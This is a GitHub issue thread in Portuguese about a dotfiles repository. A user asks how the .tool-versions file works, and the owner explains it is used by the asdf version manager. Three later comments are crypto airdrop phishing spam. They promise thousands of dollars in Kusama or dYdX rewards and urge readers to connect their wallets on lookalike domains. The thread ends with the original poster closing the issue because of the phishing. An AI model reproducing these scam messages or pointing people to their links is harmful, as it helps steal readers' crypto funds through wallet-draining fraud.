### ISSUE TITLE
como usar o .tool-versions

### ISSUE THREAD

**Issue by enieber** [medson10/dotfiles#1]
primeiro parabéns pelo repositorio, principalmente do .vimrc, já to usando no meu.. 
gostaria de saber como usar o .tool-versions para instalar essas versões especificas no meu pc, existe alguma ferramenta que usa esse arquivo como base ou vc usa ele apenas como base para fazer na mão?

**Comment by medson10** [comment]
Olá, muito obrigado, fico feliz que tenha sido útil, ainda ta bem mal organizado então espero que no geral tenha ficado claro hahah, logo mando alguns updates de umas configs mais atuais que tenho usado. Sobre esse arquivo .tool-versions é do gerenciador de versões que estou usando há algum tempo https://github.com/asdf-vm/asdf, ele é bem útil pois você pode gerenciar as versões de grande parte dos packages existentes, esse arquivo você pode deixar no root do seu usuário ~/.tool-versions, ou colocar no diretório dos projetos, eu costumo usar mais no root do usuário mesmo, facilita para configurar um setup novo, nesse caso você precisa ter o asdf instalado e os plugins que você quer usar também, daí é só rodar asdf install e ele ja vai instalar todas as versões que estão listadas para você. 

https://asdf-vm.com/#/core-configuration?id=tool-versions

**Comment by PolkdotDevelopers** [comment]
## Congratulations! You've receive in $2000 on Kusama Airdrop 🪂🔴

Kusama Airdrop: Claim up to $20,000 in Tokens Now!

→ [Earn rewards on connect you wallet](https://kusamanetworks.com/)

→ [Claim Your $KSM Today](https://kusamanetworks.com/)

Connect your wallet, follow the instructions, and claim this exclusive airdrop from Kusama. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

![Kusama Exchange](https://polkadot.network/static/b118567894df0c230e8553f2d6ea8b83/image2.png)

[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Bonus Now!** [Check Eligibility](https://kusamanetworks.com/)

Access the Kusama platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your bonus, up to $2,000!
- ✨Magic ✨ [Claim Your Bonus Now!](https://kusamanetworks.com/)

**Comment by codelou** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by enieber** [comment]
ola @medson10  estou recebendo fishing vindo dessa issue.. por conta disso vou fecha-la
